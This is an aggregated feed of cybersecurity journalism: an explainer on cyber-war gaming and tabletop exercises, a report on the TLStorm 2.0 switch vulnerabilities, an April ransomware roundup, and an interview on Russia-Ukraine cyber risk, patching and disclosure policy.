Security

FeedzyRead MorePost Content

Attackers will inevitably penetrate your defenses. The question is how effectively and quickly your current security and response strategies will perform under attack.

One preparation option is to adapt military war games into cybersecurity tabletop exercises. While cyber-war gaming isn’t a new concept, it’s not widely adopted — yet.

What is a cybersecurity tabletop exercise?

Cyber-war games are designed to provide a real-time look into how a company would defend against and respond to an attack. Red teams use the same tools as attackers to identify weaknesses in a company’s security strategy. The blue team, meanwhile, works to prevent any successful penetration by the red team from getting far into a system.

These tabletop exercises are about more than just penetration testing and trying out attack methodologies, however.

“Because the goal isn’t the same as with a vulnerability scanner or a pen test, it’s not going to be the same; you’re not going to get the same type of results you would get from there,” said Ken Smith, national lead for cyber testing at consulting firm RSM US.

Rather, cyber-war games provide insight into the state of readiness of a company’s cybersecurity strategy and how well security teams would respond to an attack.

Successful cyber-war games also involve the security team and members of a company. They are much more encompassing than red teaming or other security exercises. Companies should involve all key stakeholders, from the CEO down to security teams.

“It’s not only attack and incident response; it’s crisis management,” said Jon Oltsik, analyst at Enterprise Strategy Group, a division of TechTarget. “What would the CEO say if a reporter called? What would you say to customers, to regulators, etc.?” Buy-in from the C-suite is key. Plus, executives need to determine the goal of the assessment beforehand.

How long a war game exercise takes depends on how thorough it’s intended to be. The scope can stretch from a month to six weeks. Each test includes a follow-up report that expands on the results for security teams.

How cyber-war gaming works

Unless the cyber-war game is about testing one specific tactic or aspect of a system, let the red team try whatever they want during the attack.

“Realism is the goal,” Oltsik said. “Use the tactics, techniques and procedures that an adversary might use.”

It’s also important to have a goal for the cyber-war game exercise before putting it into action. “Are you testing new controls that have just been put in place?” Smith said. “Or has your process been entrenched for a while, and you’re looking for a refresher?”

In an exercise, the security teams use a clone of the company’s live environment to get a real-world result. The red team initiates an attack, while the blue team follows existing security strategies to see if it can detect the initial attack. From there, it becomes about which side can employ more creative and effective methods to either further or stop the attack.

Another option is to have IT create a preconfigured environment that neither the red nor blue team know about beforehand, such as occurs at events held by the National Collegiate Cyber Defense Competition. In its events, blue teams try to discern the system and how to secure it before red teams start their attacks, Smith said.

Consider an organization’s maturity level, resources

Businesses of all sizes conduct cyber-war games, but don’t test just for testing’s sake. Companies must assess their maturity level before attempting one and know what they want out of the exercise.

Companies that do annual pen tests and have two years of solid results indicate readiness, Smith said, especially “if you’re doing quarterly vulnerability scans, both internal and external, and you’re not seeing any canary-in-the-coal-mine-type situations.”

Before considering cyber-war gaming, it is also important to take into account if there are infrastructure and personnel in place to conduct, detect and respond to attacks. “If you’re missing any one of those pillars, it doesn’t end up being worth the time and effort,” Smith said.

In this instance, outsourcing is an option. Companies don’t have to handle all aspects of cyber-war gaming internally — and it can, in fact, be beneficial to outsource at least a portion of the exercise.

If your company only has a blue team, for example, it could hire a third party to conduct the attack. Even if your company has the staff and resources to conduct the exercise, consider hiring an outside red and blue team to test against the opposite internal team. Your red team may know how the internal blue team would respond and vice versa, which a third-party attacker probably wouldn’t. This could impact the test and its results.

Challenges of cyber-war gaming

Cyber-war gaming isn’t all roses. Be aware of these potential downsides before conducting an exercise.

Cyber-war gaming isn’t cheap

Conducting an assessment can be expensive. It takes time to devise the situation, determine the end goal and carry out the exercise. In some instances, the end result might not be worth the time and cost. If the blue team prevents the red team from penetrating the perimeter, you just conducted a costly pen test. On the other hand, if the red team easily makes it into the system and experiences next to no resistance, it expensively shows your cybersecurity defense needs an overhaul.

“You always run the risk it’s not worth the cost because you’re testing unknowns,” Smith said. “You might not get enough bang for your buck from the exercise. But, if your program is at the right maturity level, you’ve done your due diligence, you have your controls in place and you’re doing regular testing, this is kind of that next step to give you the reassurance of whether or not your processes are working as intended.”

Poor C-suite communications could hurt security teams

The C-suite should be included in cyber-war games, but unfortunately, that’s not always going to happen. Keep the board and C-suite apprised of how tabletop exercises perform, however, and always ensure they understand the purpose of the exercise. Remind them that a successful attack doesn’t mean the blue team failed or people should lose their jobs.

Turning it into a competition

Another concern is that tabletop exercises can become overly competitive. The red team wins more often than not, said Jeff Pollard, analyst at Forrester Research, but that isn’t meant to be an indication of failure by the blue team. Don’t hurt future cooperation by making the exercise a competition between red and blue teams.

“This is when it turns contentious and toxic,” Pollard said.

Purple teaming as an alternative

Organizations may consider using purple teaming instead of cyber-war gaming. This methodology encourages collaboration over competition. Purple teaming involves red teams working alongside blue teams to explain what they would do if they were an attacker. This helps blue teams understand potential attacks and know what to look for in the future.

“Purple teaming is a collaborative effort,” Pollard said. “War gaming can be competitive; there’s a clear ‘winner.’ With purple teaming, you can put the red team next to the blue team and show them what they would do next in an attack.”

Overall, the goal of both exercises is to improve an organization’s defenses, but cyber-war gaming is much more encompassing. In cyber-war gaming, successful red teaming helps inform a company where current processes or technology falls short and where work needs to be done and gives the blue team more experience about what a real attack looks like.

FeedzyRead MorePost Content

FeedzyRead MorePost Content

Five critical vulnerabilities in Aruba and Avaya network switches are capable of remote code execution, according to new Armis research published Tuesday.

IoT security vendor Armis dubbed the series of flaws “TLStorm 2.0,” referring to the fact that the misuse of a TLS library — NanoSSL — is the root cause of them. All five are critical; two (CVE-2022-23677 and CVE-2022-23676) affect Aruba network switches, and three (CVE-2022-29860, CVE-2022-29861 and a third that lacks a CVE) affect Avaya switches.

Armis, which discovered the flaws, detailed all five in a technical blog post. The vendor previously discovered the TLStorm series of vulnerabilities, which could be exploited via a malicious TLS packet to ignite APC Smart-UPS devices.

Barak Hadad, head of research in engineering at Armis, wrote in the blog post that TLStorm 2.0 resulted from the discovery that the NanoSSL flaws originally found in TLStorm also affected other vendors.

“The root cause for these vulnerabilities was flaws in NanoSSL library, that were applicable when certain guidelines were not properly followed by the vendor using the library,” Hadad wrote. “The vulnerabilities themselves lay within the glue-logic — the code that glues together the vendor logic and the NanoSSL library. When this code fails to adhere to certain guidelines specified in the NanoSSL manual, an edge case that leads to remote code execution can arise.”

Though the ways the Aruba and Avaya vulnerability subsets work slightly differ, both allow an attacker to break network segmentation and execute code remotely.

For example, Aruba’s flaws include a memory corruption vulnerability and one that enables an attacker to escape a network’s captive portal. Avaya’s, meanwhile, are zero-click vulnerabilities that use the web management portal to enable threat actor-controlled stack overflow and heap overflow.

One of the Avaya vulnerabilities was not given a CVE because it was found in a discontinued product line. But Hadad noted in his post that “Armis data shows these devices can still be found in the wild.”

Affected Aruba devices include the 5400R, 3810, 2920, 2930F, 2930M, 2530 and 2540 series. In Avaya’s case, the ERS3500, ERS3600, ERS4900 and ERS5900 series are affected by TLStorm 2.0. Patches are available for all affected devices except the discontinued Avaya line.

Hadad told SearchSecurity that it was “not too hard to develop an exploit” for the vulnerabilities, though it depends on the network switch model.

“The exploitability depends on the specific model and specific configuration,” he said. “For example, in the case of the Aruba switches, the user can block the management portal on some of the switch ports and limit the attack surface significantly.”

Armis said in a press release that to the best of its knowledge, there is “no indication” of TLStorm 2.0 flaws being exploited in the wild. A spokesperson for Aruba parent company Hewlett Packard Enterprise likewise told SearchSecurity there was no indication of exploitation.

Avaya did not respond to SearchSecurity’s request for comment.

Alexander Culafi is a writer, journalist and podcaster based in Boston.

Related Resources

Five Tips to Improve a Threat and Vulnerability Management Program
-SearchSecurity.com

Evolve your Endpoint Security Strategy Past Antivirus and into the Cloud
-SearchSecurity.com

Towards an Autonomous Vehicle Enabled Society: Cyber Attacks and Countermeasures
-ComputerWeekly.com

Demystifying the myths of public cloud computing
-ComputerWeekly.com

Dig Deeper on Threats and vulnerabilities

FeedzyRead MorePost Content

Ransomware attacks in April began with a burst from one of the most notorious cybercrime gangs and closed with a relative newcomer claiming an attack on one of the world’s largest beverage companies.

While it appears the number of ransomware attacks against targets in the United States has declined since Russian’s invasion of Ukraine, there were still several attacks reported and disclosed in April.

Last month, the FBI warned that U.S. agriculture could be more heavily targeted by ransomware attacks aiming to disrupt critical infrastructure. Agriculture was not the only industry that the U.S. government recently showed concern for. On April 20, a joint advisory warned of the “increased” threat of Russian hackers launching cyber attacks against the U.S.

While no ransomware attacks against critical infrastructure were publicly reported or disclosed in April, there were still examples of suspected Russian ransomware gangs hitting the U.S., including several high-profile attacks against universities and colleges.

Higher education targeted

Early in the month, the BlackCat or ALPHV group claimed two ransomware attacks, one on April 6 and the other on April 8. The claim made on the April 6 stated that BlackCat was responsible for a March cyber attack that hit North Carolina A&T State University in Greensboro, N.C. The attack disrupted systems at the university, and the group also claimed to have stolen personal information from both employees and students.

The university acknowledged that it shut down “various systems to contain the incident.” However, director of media relations Jackie Torok said that while the investigation into the incident is ongoing, “multiple investigating agencies have found no current faculty, staff or student data were affected.”

BlackCat two days later claimed it had stolen more than a terabyte of data from Florida International University in Miami. When asked about the incident, an FIU spokesperson told SearchSecurity that the investigation into the attack is still ongoing but that “at this time, we do not believe that any financial information, Social Security numbers, or information on student performance was stored on the impacted server,” and that “this incident has not impacted the education process.”

Those were not the only schools that reported ransomware attacks in April. On April 27, Austin Peay State University in Clarksville, Tenn., posted on its Twitter account stating, “APSU ALERT: Ransom ware attack. THIS IS NOT A TEST. SHUT DOWN ALL COMPUTERS NOW!” According to Clarksville Now, a news outlet that covers the area, the school canceled final exams scheduled for April 28 but resumed on Monday. The school also shut off access to its computer labs and told employees not to use their work computers.

In addition to state universities, other public entities were struck by ransomware last month. At the end of the month, Westchester County’s library announced that it was the victim of a ransomware attack, but that personal information did not appear to be compromised.

In mid-April, the computer systems in Wyandotte County, Kansas, were hit by a cyber attack that was later believed to be ransomware. As of May 2, some of the county’s systems were still down. Affected systems included the county’s district attorney, district court, department of motor vehicles and the sheriff’s office.

The attack on Wyandotte County followed a trend of threat actors hitting municipal governments in the U.S. with ransomware. The most notable of 2022 so far was the ransomware attack on Bernalillo County, N.M., in January.

Enterprise attacks

While fewer companies reported ransomware attacks in April, a ransomware gang claimed one major corporation as a victim.

On April 25, the ransomware group Stormous claimed to have stolen 161 gigabytes of data from Coca-Cola and offered to sell the data for a little over $64,000, or 1.65 bitcoin. Stormous reportedly offered to sell portions of the data to any interested parties and would change the cost depending on the amount of data. Coca-Cola has yet to officially confirm this data breach occurred but announced last week that it had begun an investigation into the alleged attack.

During the weekend of April 16, Puerto Rico’s toll system was brought down in a ransomware attack. The entity attacked was a company called Professional Account Management, which provides services for the toll system. Following the attack, government databases, webpages and collection systems for toll plazas shut down. Since the attack, Interior Secretary Noelia Garcia said that some services are back online and no personal data appears to have been breached, but the threat actors are still requesting a ransom to decrypt the rest of the system.

The ransomware attack in Puerto Rico was the first against an entity in the territory this year and the first cyber attack since its Senate was targeted in January.

Related Resources

Protect the Endpoint: Threats, Virtualization, Questions, Backup, and More
-Carbon Black

Making the case for cloud-based security
-ComputerWeekly.com

Bitdefender GravityZone Ultra Suite
-Bitdefender

Making the case for cloud-based security
-ComputerWeekly.com

Dig Deeper on Threat detection and response

What’s up with Conti and REvil, and should we be worrying?

BlackCat emerges as one of the top ransomware threats

Ransomware demands and payments increase with use of leak sites

Details of Conti ransomware affiliate released

FeedzyRead MorePost Content

FeedzyRead MorePost Content

FeedzyRead MorePost Content

Dave Sobel is host of the podcast The Business of Tech and co-host of the podcast Killing IT. In addition, he wrote Virtualization: Defined. Sobel is regarded as a leading expert in the delivery of technology services, with broad experience in both technology and business.

In this video, Sobel looks at what the Russia-Ukraine war means for cybersecurity in the IT services space with Blackpoint Cyber CEO Jon Murchison. Murchison discusses a worst-case scenario and what best practices IT services providers should have in place to protect their business and customers.

Transcript follows below. Minor edits have been made for brevity and clarity.

Dave Sobel: I wanted to bring somebody in from the security space to talk to me a little bit about the current situation related to Ukraine and Russia. It’s on all of our minds. And, from a cyber perspective, I think most of us in IT services are looking, going like, ‘Well, it feels like attacks are going a little lower because they’re focused on one another.’ What are the experts seeing? What are you seeing?

Jon Murchison: This is a really big topic. As soon as this popped off, it was like instant security theater from every marketing department, like ‘The world’s going to come down.’ We internally recorded a private video, not for public consumption, of our thoughts to our customer base. And here’s the uncut, just pragmatic take. We have seen zero increase in volume or sophistication of attacks, either from nation-states or ransomware groups. Now, when we talk to the MSP space, I would say ransomware is 95% of what we’re stopping on pretty much a daily basis. Nation-states are more like 2%, just because [for] the typical customer an MSP serves — unless it’s like a regional utility or some small boutique manufacturer in a critical supply chain for a defense or aircraft or whatever — you just don’t see [nation-states attack] a lot.

With that being said, it is plausible to think that maybe the Russian-based ransomware groups could feel more empowered to increase their operations. At the same time, Conti had some issues. Conti is obviously one of the biggest Russian-based ransomware syndicates. And, like all these syndicates, they’re folks from all different countries. I don’t know if they had Ukrainian guys in the game or not, but they probably had some pretty massive leaks that has caused for us to see different tradecraft.

Big picture, it’s a good reminder to button up on the fundamentals. When nation-states go to war, you must assume the nation-state assets coalesce to focus on that topic. And they can’t take on everyone at once. They have a lot of things going on. They’re getting bogged down, obviously, in the conventional military side. They have vigilante cyber groups going after them. That has to eat up some of their defensive capabilities. And I would think their offensive guys are still primarily focused on Ukraine. That’s not to say there isn’t a threat here in the United States, that we shouldn’t be prepared. We should. But I think you’re really looking more at banking, big manufacturers, logistics. Then, critical infrastructure — I don’t know where that magic red line is because this has never really happened, like full-scale nation-state-on-nation-state warfare. I have to think there’s a red line, but I have to think the bar would be a little bit lower for regional municipalities. We see a lot of combined networks. Big picture, we haven’t seen anything yet, but we’re prepared if we do.

Sobel: Is that the extent of the collateral damage? Do you think there’s collateral damage we need to be thinking about in this conflict?

Murchison: I think the collateral damage will happen if offensive actions are taken against Western countries, where it’s like, ‘This is clearly a nation-state, not just like a criminal syndicate or something like that.’ I haven’t seen it happen, or I don’t know enough deep-in-the-weeds technical details, [but] I have read that there have been — and I have no inside info — that there have been some attacks on Ukrainian ISP internet infrastructure. That has always been my greatest concern. Utilities and SCADA [supervisory control and data acquisition] attacks and all this stuff, and banks get all the press. But the reality is SCADA attacks are still pretty hard to pull off. And, when you look at the one the Russians did against the Ukrainians a bunch of years ago, did it shock everyone? Yes. It took the power out for about 230,000 people, for like [one to six hours], but there’s actually no SCADA protocol or [programmable logic controller] attack in that. It was actually more ‘live off the land, literally open the breaker’ type attack and destroy everything on the way out. And, frankly, we have thunderstorms in the spring and summer that do way worse here all the time. Those are really hard. I worry much more about routing and switching infrastructure at the core. That is the glue that everyone sleeps on that is, by far, in my opinion, the most critical infrastructure when it comes to internet [communications] because it just has cascading effects everywhere.

Sobel: I’m going to ask you, then, to take out your crystal ball, and the typical caveats on this, it’s a crystal ball. It’s cracked, and it’s foggy.

Murchison: So, I’m just going to make it up.

Sobel: Right. So, we know it’s not great. Talk to me about how you think this might play out, and maybe we’ll do sort of two scenarios to give you a little sense. What’s the worst way this might play out, cyber-wise, and what we’d be hoping for on the good end of the spectrum?

Murchison: I think the worst way this plays out on the cyber side is there’s large-scale attacks against internet communications, infrastructure, media infrastructure, banking, manufacturing and logistics. That being said … I mean, I come from the intelligence community world. I also think that’s really hard to pull off and time it right. These things just don’t work. There’s not physics involved quite the same as launching a missile and it hits the target. You fail way more than you ever win. Achieving effect with timing, achieving the ultimate mission goal, it’s quite difficult, and it requires a lot of things to go your way. And I also can’t imagine doing it while being attacked at the same time. It would actually be quite difficult. I think, on the worst-case scenario, they just decide to go all in on cyber warfare. I got to be honest, I think, if that happens, this is escalating to a whole other ballgame. We need to be candid, cyber is like the least of our worries. I worry much, much more [about other types of attacks], to be candid, and way less about the cyber side. I worry way more on this going something past conventional or something where our satellite infrastructure is.

Sobel: I want to do a double-check. I think the answer is the standard best practices, but I want to double-check it. From a typical IT services company, serving a collection of customers, are the recommendations essentially just continue good best practices, or is there something unique to this situation?

Murchison: No, I think there’s more, but I don’t think it’s unique to Russia-Ukraine. I think it’s unique to the threat of an attack on your continuity of operations, whether it’s ransomware, or data theft, or the holding you hostage, or a destructive attack, like the wiper stuff we see. Industry best practices mostly, to me, focus on reducing your attack surface. The way we like to look at it — and it’s kind of a riff of a [NIST] model, called the Cyber Defense Matrix that Sounil Yu made — but we take a step back, and you look at any infrastructure, and this is taking compliance out of it because I consider that mostly checkbox security. In bucket one, you need to have some capability to identify your assets’ patch level, what you have. And that’s actually something we see people whiff on all the time. You have to know what you need to protect and have some live visibility into it. That’s step one.

Step two, which is where I see a lot of the best practices come in, is hardening. This is IT hygiene. This is everything from locking down your remote monitoring and management, multifactor authentication, regular patching, continuous external vulnerability scanning specifically that reduces your susceptibility to remote code execution. That’s a key area.

And then, the next two areas [are] where I diverge with industry best practices, kind of in air quotes, because, when you look at detection, most cyber malicious activity breach detection is so myopically focused on the malicious tool set. And the dirty secret, if you’ve ever done this game before, is your malicious tool sets are part of the game, but so much of what you do on the keys looks like clever system administration. You’re trying to figure out where you are, your testing cred, your port scanning, and that’s what we call ‘tradecrafter behavior.’ And that’s where these two worlds need to be merged together. And, frankly, there just aren’t a lot of people that are good at it out there still — because so much of the dev effort goes towards catching the malicious software. I always say, if you ask a software engineer — which I consider the biggest brain guys — to catch a hacker, they’re going to try and catch what they would make if they were on the offensive side, which is persistence techniques, exploit techniques and then just malware in general. If you ask the guy in the keys, many times, he’s going to be looking for some amount of dollar sign chair, all that live off the land, privileged creds, lateral spread. I think it’s really important in the tech, you merge those two areas.

And then the third part is response. This is where our industry has kind of bastardized the term a lot. But what it really should mean is real-time response. If you don’t have a capability at two in the morning to operate within, assume your breach and assume your automated security tools don’t succeed, how are you going to take action? And I think that’s where the industry’s changing. The typical model was, I get a SIEM [security information and event management], I gobble up terabytes of logs, I make dashboards and I have threat hunting. Well, that does not work at line rate, period. It just does not work fast enough, but it’s great for compliance. It’s great for checking the boxes. It’s great for forensics post-breach.

And then the last bit would be really the right of boom, assuming all went wrong, and that’s best practices, cloud backups, having a disaster recovery plan, just making sure you have your insurance and [incident response] folks, that you actually know who to call. I think part of it is what capabilities you have in place, combined with best practices on hardening.

Sobel: I’m going to ask you a really targeted one around best practices because it’s one that I feel gets an interesting debate. The head of the U.K. cyber center actually came out recently and sort of commented, ‘I think most businesses should go to [automated] patching because patching is a pretty standardized thing these days. It’s pretty well maintained. These big companies generally know what they’re doing. And, by the way, because of the problem, like just turn [automated] patching on.’ Most IT providers come from a legacy of thinking everything has to be tested, constantly checked. Where do you fall in this idea of — particularly for smaller companies like the typical SMB — shouldn’t they just turn autopatching on? Isn’t that better?

Murchison: I’m going to have a weird answer. I was a network engineer before I got into hacking. I have a natural reaction that the IT guys have, which is, ‘until my Windows 11 computer can update and not break shit.’ … Think of manufacturers. There are so many industries where a patch takes them down. It can do as much harm as good. I’m a firm believer in continuous vulnerability scanning in a regular patching platform. If I saw a better track record of autopatching not breaking stuff, then maybe I’d support it. But I can tell you, we have issues once in a while in our cloud where we run a really modern stack, and Amazon might auto patch something for us that causes us problems.

I think there’s just too many moving parts to send it. Now, if you’re just talking about like auto Windows update on like an attorney’s office that doesn’t have manufacturing or any sort of weird technologies, yeah, I think it’d be fine. And I actually think Microsoft is working on some really cool new patching capabilities via their Graph API, if I’ve heard it right, that are outside of the Windows update. And I think that might open the door for a little more flexibility.

Sobel: I’ll let you split the difference on that because, in fact, when I think of that, I do actually think of that typical small little lawyer. And I just sort of say, ‘I think that I’ll just turn the thing on automatically.’

Murchison: That one’s probably good. When I look at our customer base, we do large enterprise, too, but it is like everything from a tiny five-person property management shop to a lot of manufacturers, logistics and people that really will go down hard if the patch messes up.

Sobel: And I think, by the way, this is where the expertise comes in. But it isn’t a one size fits all. And I am advocating, at least, for many network engineers to go, ‘Look, in some of these cases, autopatching is better.’ There are use cases at the low end where just make that automatic and don’t think about it because that’s the bigger risk for them.

Murchison: I think so. But, you know, also when I look at what burns most companies. … It’s funny, if you read the Verizon breach report, it’s phishing, phishing, phishing, phishing. We do not see phishing as the number one way you get ransomware. It’s the number one way you’re going to detect malware because it’s coming in through there all the time. And I think that skews the results. What we still see nonstop, [Remote Desktop Protocol] opening internet, a lack of patching on your network and security appliances. That’s a huge area. Running a [demilitarized zone], they should be dead. Everyone screws them up. They screw up the rules. It’s hard to write the firewall rules right. Maybe autopatching is best on anything sitting live on the boundary internet-facing.

When it comes to the inside, the reality is it’s rare that we see exploits thrown inside the network. Usually, it’s a way to get in. I’ll tell you the area I totally believe in autopatching is in the browser. I’m sure hackers would disagree, but my opinion is the holy grail exploit, the one if you could pick any exploit you want — it’s not a firewall exploit because everyone runs a different firewall — it’d be like an Edge, Chrome or Firefox remote code execution technique. If I can give them an ad or something or whatever exploit and get access to their system, that is the area. That should be, as soon as a new update comes out, roll it because that has less effects than a system patch — because system patches just aren’t exploited that much inside the network. I would focus on boundary.

Sobel: That’s some great advice. I’m going to give one more targeted technical and then move this back into regulation. What about the idea of just blocking countries? The vast majority of small businesses, which are most businesses out there, they’re not doing business with a long list of countries that just shouldn’t even have access. Why aren’t the default rules set to just block a whole bunch of countries from even coming in? Would that make more sense?

Murchison: Yes. Beats the hell of me why it’s not. It should be just by default, period. Now, if someone really wants, it knocks out a certain amount of low-hanging fruit. There’s no cost to doing it, and there’s really no drawback for not doing it. I 100% agree with you, Dave. There’s no question, those should be blocked default. I will caveat that with, we stopped the nation-state attack on one of our non-MSP customers the week of Thanksgiving. This was definitely in relation to a political move we made as a country. That night, we had guys come in. This entity was running two next-gen [antivirus endpoint detection and response] in addition to us, and the bad guys evaded both of those, no problem. Not a single alert, but they used residential proxy infrastructure in the U.S. to come through the United States to hide their tracks. SolarWinds stuff did that, too. And any legit operator will do that. It’s not a cure-all, but it’s a definite, do it.

Sobel: And that’s what I’m getting at, is just like, ‘Hey, if we can reduce our attack surfaces, let’s do the simple things,’ knowing, again, for the typical small, midsize company, they’re not going to win against a nation-state. Let’s just do that. Let me pivot then a little bit to regulation and the landscape. What’s your take on the need for more formal rules of engagement around cyber, like similar to the Geneva Convention or international laws on physical warfare? Because it feels like we don’t have even law enforcement or diplomatic rules to latch onto here. What’s your take on the need for these formal rules?

Murchison: That is a loaded question. First off, I don’t believe any international norms, diplomatic engagement, when a country or nation-state is desperate enough, they don’t care. I think we’re seeing that in Ukraine right this second. Cluster munitions — using them like crazy. White phosphorus — using them. I don’t think that actually really moves the needle, I think that feels good. I’ll tell you the area where we need a lot more focus is. … Step one, everyone creates a compliance framework. And, when I read these, half the compliance frameworks out there, they’re written clearly from someone that was never an offensive practitioner or even a hardcore defensive. And they’ve written all post-breach lessons learned. Like you must have these logs so we can figure out what data was stolen. But, at the end of the day, these things should be increasing your capacity to not get breached in the first place or, if you do, nullify it before the adversary completes their objectives.

This is why I’m a huge fan of the [Center for Internet Security’s] benchmarks and controls because they’re actually prescriptive. They tell you to configure the following settings to reduce your attack surface. Whether it’s by regulation or the market drives it, I think this is something where MSPs should really be looking to adopt it because, honestly, it’s just smart business. Anything you can do to reduce your chances as an MSP owner from your customer getting smashed and then blaming you, which hurts your insurance and your whole business model, I would do it.

I’ll tell you the other area — and others might not agree with me — that I think needs some tightening up. We have an insurance agency, right? We had to get licensed and fingerprinted in all 50 states to resell someone else’s insurance policy. Yet, I can go write an exploit proof-of-concept code, throw it up on GitHub and get all the congratulations from the security community, no license, no regulation. People will do bug bounties. One of the scariest things — and I agree, we need bug bounty stuff — but one of the things that always makes me nervous is when you have vigilante entities out there that are doing pen testing without your request, which we all know it’s kind of like, ‘Do it well.’ You have to cross that line sometimes and actually execute code. When they do that and they’re like, ‘Oh my gosh. We have something bad,’ they call the company. Then, they make scanners that try to find other vulnerable victims. Well, to think that nation-states are not looking and have honeypots out there looking for these people with new exploit techniques, you’re crazy. They are. And that’s a great way, in the interest of security, to actually let the cat out of the bag. And then, it takes it a step further. Now, you’re arming maybe more competent and capable adversaries with your great new research findings. And then, you call the company, and then you [Common Vulnerabilities and Exposures] them when maybe there is no user involvement required. I think it’s ethically corrupt, and I think it’s not good for security because, if you can close a problem, there’s no impact, no harm. It hasn’t been taken advantage of. You’re still operating as a defender with a bit of an information asymmetry advantage or that vendor. When you make it public, how many variant follow-on [attacks]? Also, like the Exchange thing had multiple. … Once the community found out about it, you start seeing follow-on exploits. And so, that’s why I think nuance matters, details matter. And we have to balance transparency with actually doing what’s right for the end customer and vendor to keep the infrastructure secure so that it isn’t all about just getting resume builders for the security research community. Because I think they play an incredibly legit role, but there’s no security industry I’ve ever seen in the world with utter, complete 100% transparency.

Sobel: You’ve opened the door. My follow-on question is obvious. What’s your take on what a vulnerability disclosure program should be like? What’s the way that it should work for software vendors?

Murchison: In my opinion, if there is a vulnerability that requires end-user involvement, like the IT guy, the end customer, to apply a patch because it cannot be pushed out, you have to shout that from the rooftops. That has to be public, and it has to be everywhere. If you have a capability that was brought to you, there was no evidence that it was ever exploited, it was never known about a criminal group, I personally think the act of writing about that is doing nothing but educating your adversaries on a potential weakness. And, if it was covered up, I think everyone should keep their mouth shut. I also think a formal bug bounty program, where you can work with the researchers, is really good.

Sobel: That’s why I asked the question. If vulnerability disclosure is the front end, let me ask then what’s your take on breach disclosure, which is essentially the back end of that. What’s your take on breach disclosure notifications?

Murchison: Oh, I think that’s a legal issue. And I think you absolutely have to do it, and each state has different rules on it. First off, that is something like you. … Listen. You kind of judge people on what they do when no one’s looking, right? And I think this is a perfect case, if you sweep it under the rug, that’s an unethical move. You need to inform your customers. I would say the definition of breach is also, maybe there’s a legal definition for it, but you know. … We stop stuff every day. Bad guys in network, he’s going nowhere, he’s snuffed out done. Should a vendor disclose that to the world? I don’t know. I don’t think that does anything for anyone but create concern or panic. If part of their code base was stolen, if their customer data was stolen, unequivocally, you have to.

Sobel: OK. I’m going to ask it a different way then. If I gave you the magic wand and you could cast a federal piece of regulation around breach disclosure, what would your version look like?

Murchison: I think my version would start with a definition of what we considered a breach. So, kind of along the lines of what I was just saying: loss of customer data, loss of [personally identifiable information], loss of source code or something that could enable follow-on attacks or something that actually disrupted operations. There was a malicious thing that disrupted operations and maybe left you not serviced at that point in time. That’s something where there should be a requirement to disclose to your customer base and a requirement to disclose to the appropriate government agency.

About the author
Dave Sobel is host of the podcastThe Business of Tech, co-host of the podcast Killing IT and authored the book Virtualization: Defined. Sobel is regarded as a leading expert in the delivery of technology services, with broad experience in both technology and business. He owned and operated an IT solution provider and MSP for more than a decade and has worked for vendors such as Level Platforms, GFI, LOGICnow and SolarWinds, leading community, event, marketing and product strategies, as well as M&A activities. Sobel has received multiple industry recognitions, including CRN Channel Chief, CRN UK A-List, Channel Futures Circle of Excellence winner, Channel Pro’s 20/20 Visionaries and MSPmentor 250.

Dig Deeper on MSP business strategy